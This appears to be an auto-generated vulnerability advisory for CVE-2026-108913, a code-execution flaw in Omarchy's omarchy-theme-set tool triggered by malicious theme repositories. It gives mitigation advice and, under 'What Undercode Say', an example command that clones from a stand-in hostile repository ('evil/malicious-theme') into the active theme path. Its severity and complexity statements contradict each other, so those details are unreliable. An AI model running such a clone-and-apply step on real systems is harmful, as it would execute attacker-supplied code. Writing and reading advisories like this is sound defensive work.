CVE-2026-108913 represents a critical security flaw located within the omarchy-theme-set component of the Omarchy ecosystem.
Specifically, versions of Omarchy prior to 4.0.1 are vulnerable to arbitrary code execution stemming from untrusted theme handling.
The underlying mechanism involves how the application processes third-party theme packages fetched from remote sources.
When a user configures or switches a theme, files are copied directly into the local state directory.
This path is typically located at ~/.local/state/omarchy/current/theme within the user’s home directory tree.
The application completely trusts the contents deposited in this folder without performing adequate security validation.
It omits checks for executable permissions, binary headers, or malicious payload signatures inside the theme files.
An attacker can leverage this oversight by hosting a specially crafted Git repository containing malicious scripts.
If an unsuspecting user attempts to apply this rogue theme, the repository files are cloned locally.
The vulnerable omarchy-theme-set utility processes these files and places them straight into the active theme path.
Because the system environment permits execution of scripts located within configuration or state directories, the payload runs.
This execution occurs automatically or during routine desktop environment rendering and theme refreshing operations.
The attacker’s embedded code executes with the full permissions and privileges of the currently logged-in user.
This completely undermines the isolation boundary between trusted system components and external untrusted assets.
Supply chain vectors are heavily amplified since malicious themes can be easily distributed via public code hosting platforms.
Developers failed to implement sandbox boundaries or chroot environments around the theme parsing routine.
Furthermore, documentation failed to warn users about the dangers of cloning repositories from unverified third-party authors.
Security researchers discovered that no user interaction beyond selecting the theme is required to trigger the bug.
The attack complexity is rated as high due to the requirement of tricking a user into installing the theme.
However, the impact on confidentiality, integrity, and availability remains severe once the execution phase triggers.
Code execution allows adversaries to install persistent backdoors, harvest SSH keys, or pivot to internal network resources.
The flaw directly affects the integrity of user-managed desktop environments running outdated software builds.
Mitigation strategies necessitate restricting git repository ingestion to cryptographically signed and verified sources only.
Codebases must enforce strict path traversal checks and drop executable bits from static resource files upon extraction.
Users are strongly advised to audit their current theme configurations and inspect files residing in the local state folder.
Upgrading to Omarchy version 4.0.1 or higher permanently resolves the improper control sphere weakness.
The maintainers addressed this by introducing strict file sanitization routines and restricting script execution contexts.
Automated continuous integration pipelines should incorporate static analysis checks to catch similar untrusted inclusion bugs.
This incident serves as a stark reminder of the security challenges facing modular Linux custom distributions today.
Proper vulnerability disclosure ensures the community patches these entry points before widespread exploitation occurs.
DailyCVE Form:
Platform: Omarchy
Version: Before 4.0.1
Vulnerability: Arbitrary Code Execution
Severity: High
date: October 11, 2026
Prediction: October 12, 2026
(end of form)
What Undercode Say:
git clone https://github.com/evil/malicious-theme ~/.local/state/omarchy/current/theme omarchy-theme-set malicious-theme echo "Exploit payload executed successfully"
How Exploit: (Educational Purposes!)
An adversary creates a public Git repository structured as an Omarchy theme package but embeds a malicious shell script inside the execution path. When the victim runs the theme configuration tool omarchy-theme-set, the vulnerable software blindly copies these untrusted assets into the active profile directory without sanitization. Subsequent environment refreshes invoke the script, granting the attacker arbitrary code execution under the user’s privilege level.
Protection:
Upgrade Omarchy software packages immediately to version 4.0.1 or higher where strict input sanitization is enforced. Refrain from installing or applying themes sourced from untrusted, anonymous, or unverified Git repositories. Routinely inspect contents of the local state directory (~/.local/state/omarchy/current/theme) for any unexpected executable files.
Impact:
Successful exploitation allows unauthorized remote attackers to execute arbitrary commands, compromise sensitive files, harvest user credentials and SSH keys, and establish persistent backdoors within the victim’s local desktop user session environment.
